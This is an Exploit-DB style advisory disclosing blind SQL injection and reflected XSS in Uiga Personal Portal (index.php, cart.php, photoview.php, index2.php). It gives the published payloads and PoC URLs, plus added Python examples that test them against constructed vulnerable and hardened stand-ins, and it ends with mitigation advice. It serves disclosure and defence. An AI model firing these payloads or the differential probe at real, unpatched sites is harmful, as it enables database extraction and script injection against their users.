Vendor: Uiga Personal Portal
By: Eyup CELIK
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection and XSS
CWE: 89 (SQL Injection), 79 (Cross-site Scripting)
Product Name: Uiga Personal Portal
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: all versions are reported vulnerable
Date: 2011

Uiga Personal Portal Multiple Vulnerability

Blind SQL injection and reflected cross-site scripting are reachable through user-controlled input on index.php, cart.php, includes/photoview.php and index2.php. The SQL injection is in the exhort parameter of index.php: the published payload, index.php?exhort=%2440-2+2*3-6&view=ar_det, replaces the record identifier with an arithmetic expression, and if the application splices that value into its query the database evaluates it and returns a different record than the literal would. Note that a literal + in a query string is decoded as a space by the server, so the expression must be sent with %2B for it to reach the database as an operator. The XSS is reflected from the request path: appending /%22onmouseover=prompt(955787)%3E to cart.php, includes/photoview.php or index2.php places a double quote and an event-handler attribute into the page, so the leading quote closes an attribute that the page builds from the request path and the onmouseover handler becomes part of the tag.
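The following Python block is an added example, not code from Uiga Personal Portal or from the advisory author. It shows the differential test that turns the advisory's arithmetic payload into a yes/no answer: three requests whose responses line up only if the backend evaluates the expression. The two page functions are constructed stand-ins for index.php, one concatenating the exhort value into SQL (the flaw) and one validating and binding it; the table layout, the sample rows and the reading of the leading "$" (assumed to be a fixed prefix in front of a numeric id) are all assumptions. It also shows the wire form of the payload, since the "+" in the published PoC must be sent as %2B.

```python
"""Differential probe for arithmetic blind SQL injection (added example).

Stand-ins for index.php: vulnerable_page() splices the id into SQL,
safe_page() validates and binds it. Table, rows and the '$' prefix
handling are assumptions, not the portal's real code.
"""
import sqlite3
from typing import Callable
from urllib.parse import quote

# Constructed sample data standing in for the portal's article table.
ROWS = [(37, "Article thirty-seven"), (38, "Article thirty-eight"), (40, "Article forty")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", ROWS)
    return conn


def strip_prefix(exhort: str) -> str:
    """Assumption: the '$' (sent as %24) is a fixed prefix; the record id follows it."""
    return exhort[1:] if exhort.startswith("$") else exhort


def vulnerable_page(exhort: str) -> str:
    """Models the flaw: the id is concatenated into the WHERE clause, so the
    database evaluates whatever expression the client supplies."""
    sql = "SELECT title FROM articles WHERE id = " + strip_prefix(exhort)
    try:
        row = make_db().execute(sql).fetchone()
    except sqlite3.Error:
        return "error"
    return row[0] if row else "not found"


def safe_page(exhort: str) -> str:
    """Hardened form: the id must be an integer and is passed as a bound parameter."""
    ident = strip_prefix(exhort)
    if not ident.isdigit():
        return "bad request"
    row = make_db().execute(
        "SELECT title FROM articles WHERE id = ?", (int(ident),)
    ).fetchone()
    return row[0] if row else "not found"


def encode_payload(exhort: str) -> str:
    """URL-encode the parameter value. Without this a literal '+' is decoded
    as a space by the server and the expression never reaches the database
    intact: '$' -> %24, '+' -> %2B, '*' -> %2A."""
    return quote(exhort, safe="")


def arithmetic_probe(fetch: Callable[[str], str], base: int = 40) -> bool:
    """Three requests whose responses line up only if the backend does arithmetic:

      control     $<base-2>          the record the expression should select
      true_expr   $<base>-2+2*3-6    evaluates to base-2 when executed by the DB
      false_expr  $<base>-2+2*3-7    evaluates to base-3, so must select another record

    A backend that validates or binds the parameter cannot satisfy both conditions.
    """
    control = fetch(f"${base - 2}")
    true_expr = fetch(f"${base}-2+2*3-6")
    false_expr = fetch(f"${base}-2+2*3-7")
    return control == true_expr and control != false_expr


if __name__ == "__main__":
    print("vulnerable backend:", arithmetic_probe(vulnerable_page))   # True
    print("hardened backend:  ", arithmetic_probe(safe_page))         # False
    print("wire form of the advisory payload:", encode_payload("$40-2+2*3-6"))
```

Against a live target, fetch would be an HTTP call that returns the response body with volatile parts (timestamps, session tokens) removed before comparison; the false expression is there to rule out a backend that simply ignores the parameter and returns the same page for everything.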

Mitigation:

No patch is available. Treat the exhort value as an integer and pass it to the database as a bound parameter instead of building the query by string concatenation; a value that is not a plain integer should be rejected. For the XSS, HTML-encode the request path and any other request data before writing it into markup, using attribute-safe encoding (double quotes included) wherever the value lands inside an attribute such as a form action.
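As an added example (not code from Uiga Personal Portal or the advisory author), the block below shows the reflected-XSS check for the path-based payload and the encoding fix described above. The renderers are constructed stand-ins for cart.php; the assumed sink is a form action built from the decoded request path (the usual PHP_SELF / PATH_INFO reflection), and whether that is the portal's actual sink is an assumption. The check parses the response as HTML and reports any event-handler attribute the browser would see, which is stronger evidence than merely finding the probe string in the body.

```python
"""Reflected XSS check for a path-based payload (added example).

vulnerable_render() and safe_render() are constructed stand-ins for cart.php;
the form-action sink is an assumption, not the portal's real code.
"""
import html
from html.parser import HTMLParser
from typing import Callable, List, Tuple
from urllib.parse import quote, unquote

PROBE = '"onmouseover=prompt(955787)>'   # the advisory's payload, decoded


class EventHandlerFinder(HTMLParser):
    """Collects (tag, attribute name, attribute value) for every on* attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name, value or ""))


def vulnerable_render(request_path: str) -> str:
    """Assumed flaw: the decoded request path is written into an attribute unescaped.
    The probe's leading quote closes action="..." and the rest becomes a new attribute."""
    return f'<form action="{unquote(request_path)}" method="post"></form>'


def safe_render(request_path: str) -> str:
    """Hardened form: attribute-safe HTML encoding, so '"' becomes &quot; and '>'
    becomes &gt;, keeping the whole payload inside the action value."""
    escaped = html.escape(unquote(request_path), quote=True)
    return f'<form action="{escaped}" method="post"></form>'


def injected_handlers(render: Callable[[str], str],
                      script: str = "/uigaportal/cart.php") -> List[Tuple[str, str, str]]:
    """Request <script>/<url-encoded probe> and return the event handlers
    a browser would find in the response (empty list means not injectable)."""
    body = render(script + "/" + quote(PROBE, safe=""))
    finder = EventHandlerFinder()
    finder.feed(body)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    print("vulnerable:", injected_handlers(vulnerable_render))  # [('form', 'onmouseover', 'prompt(955787)')]
    print("hardened:  ", injected_handlers(safe_render))        # []
```

The same finder works on a real response body fetched over HTTP; the only change is that render becomes the HTTP call, and the script argument is the path of whichever vulnerable page is being tested (cart.php, includes/photoview.php or index2.php).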

Exploit-DB raw data:

# Exploit Title: Uiga Personal Portal Multiple Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr


ISSUE

Blind SQL Injection and XSS are possible through user-controlled input

Vulnerable Page:
index.php
cart.php
includes/photoview.php
index2.php

Example:
index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
cart.php/<XSS Code>
includes/photoview.php/<XSS Code>
index2.php/<XSS Code>


Exploit:
index.php?exhort=%2440-2+2*3-6&view=ar_det
cart.php/"onmouseover=prompt(955787)>
includes/photoview.php/"onmouseover=prompt(955787)>
index2.php/"onmouseover=prompt(955787)>


POC:
127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E